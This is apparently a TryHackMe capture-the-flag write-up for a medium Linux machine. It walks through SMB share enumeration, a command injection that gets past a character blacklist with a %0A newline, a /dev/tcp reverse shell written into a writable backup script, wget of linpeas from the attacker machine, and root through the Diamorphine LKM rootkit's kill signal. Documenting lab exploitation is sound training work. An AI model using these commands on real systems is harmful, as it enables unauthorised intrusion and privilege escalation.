Level: Medium
Machine: Linux
Link: THM Room link
A room about web mis-configuration and reverse engineering a rootkit!
Lets get into it
Lets start off with our frontface, which is a custom made recon script specially made for THM and HTB
FrontFace Github
./frontface.sh [ip]
There are four ports open 22,80,139,445
Webserver (Port 80)
Visiting the webpage we get A pretty static site, we can try gobuster but it doesnt result anything interesting either
Samba (Port 139,445)
Trying samba to list shares with null password we get,
smbclient -N -L
We find a share public
, lets access it and give it no password
smbclient //
Let’s read the file and we find a potential route /myrouterpanel
Visiting the page we get,
and we find its pinging utility service from the web, what this means is the server is probably running ping
on the server machine, which hints us with command injection
Lets fire up burp to see whats going on
, and we get response as Attemp Hacking
, so theres some filters on the server.
Looking through command injection payloads from github, we find one particular payload to be working %0Aid
out of which %0A
is a newline feed in hex, trying the payload
payload ip=
and we get code execution! alright next up is we look at the file so we can see what filters are there
payload ip=
- Snipped output
function containsMaliciousCharacters($input) {
// Define the set of characters to check for
$maliciousChars = array(';', '&', '|');
// Check if any of the malicious characters exist in the input
foreach ($maliciousChars as $char) {
if (stripos($input, $char) !== false) {
return true;
return false;
so we see the blacklisted characters.
Lets try to get a shell on the box
start a listener on nc -lnvp 4242
- Payload
and we get a hit, lets stabilize the shell to get a fully interactive pty shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z to bg
stty raw -echo; fg
Press enter to get back on the shell
export TERM=xterm
Initial foothold
Looking at available users we get we see there are three users, now lets run linpeas.sh to look for any potential privesc vector
Attacker Machine:
python3 -m http.server 8001
Target Machine:
wget attacker_ip:8001/linpeas.sh
chmod +x linpeas.sh
Running linpeas we find one interesting service running
Lets check the service
cat /etc/systemd/system/athena_backup.service
so its running backup service every 1 minute, lets check backup.sh
cat /usr/share/backup/backup.sh`
Checking the permission on the file we see its writable
so we could potentially write a reverse shell and let it run
www-data to athena
Editing the file with our revshell payload
bash -i >& /dev/tcp/ 0>&1
make sure to overwrite it and start a listener on attacking machine and we get a shell as athena!
- you can find user.txt in /home/athena
After looking at sudo -l
we see theres a binary runnable by root, lets get the binary on our machine to analyze it in ghidra
Target machine:
python3 -m http.server 8001
Attacking machine:
wget targetip:8001/venom.ko
Lets fire up ghidra and see whats it about
Make sure to analyze the binary as asked in the popup
Looking at the available functions we have
hmm, interesting, you can go ahead and look at all the functions and whats it doing
okay now lets check for strings
looking at the strings, we can see the description says LKM rootkit
and author m0nad
, so we know were dealing with a rootkit, lets search what its about
LKM rookit m0nad
Doing a quick google search lkm rootkit m0nad
we find a github repo for https://github.com/m0nad/Diamorphine and we know we had a function called diamorphine_cleaup
and diamorphine_init
, so chances are its the same.
what is a rootkit?
The term rootkit is a connection of the two words "root" and "kit." Originally, a rootkit was **a collection of tools that enabled administrator-level access to a computer or network**
_Check Reference for more reading_
what is diamorphine rootkit?
Diamorphine is a LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x and ARM64
_Check Reference for more reading_
what is it doing?
so looking at the github readme, we get to know its capable of doing of some interesting things like
- When loaded, the module starts invisible;
- Hide/unhide any process by sending a signal 31;
- Sending a signal 63(to any pid) makes the module become (in)visible;
- Sending a signal 64(to any pid) makes the given user become root;
- Files or directories starting with the MAGIC_PREFIX become invisible;
- Source: (https://github.com/m0nad/Diamorphine)
out of which sending a signal 64 gives us root
is more interesting, lets try to weaponize it.
athena to root
so we have a rootkit, follow the steps carefully
Load the rootkit
sudo /usr/sbin/insmod /mnt/.../secret/venom.ko
insmod: inserts kernel modules
- check if its loaded
dmesg: displays kernel related modules
snipped output
- get root by sending a signal to 64 with any pid oh wait, we get operation not permitted? hmm lets go back and look at the functions
hacked_kill function
You can check the function graph
to get a detailed view of how the functions are being called and when
Looking at the function we can see if ivar3==0x39
call give_root()
and 0x39
is 57
in decimal, so this means the SIGNAL
it wants to give root is 57
- Lets send a kill signal with 57 and with any pid
kill -57 0
- check id
and we get root!
- you can find the root.txt in /root
- Diamorphine Rootkit: https://github.com/m0nad/Diamorphine
- LKM - https://en.wikipedia.org/wiki/Loadable_kernel_module
- LKM rootkit - https://www.giac.org/paper/gsec/935/kernel-rootkits/101864
- Linux LKM rootkit - https://www.youtube.com/watch?v=hsk450he7nI
Thanks for reading!!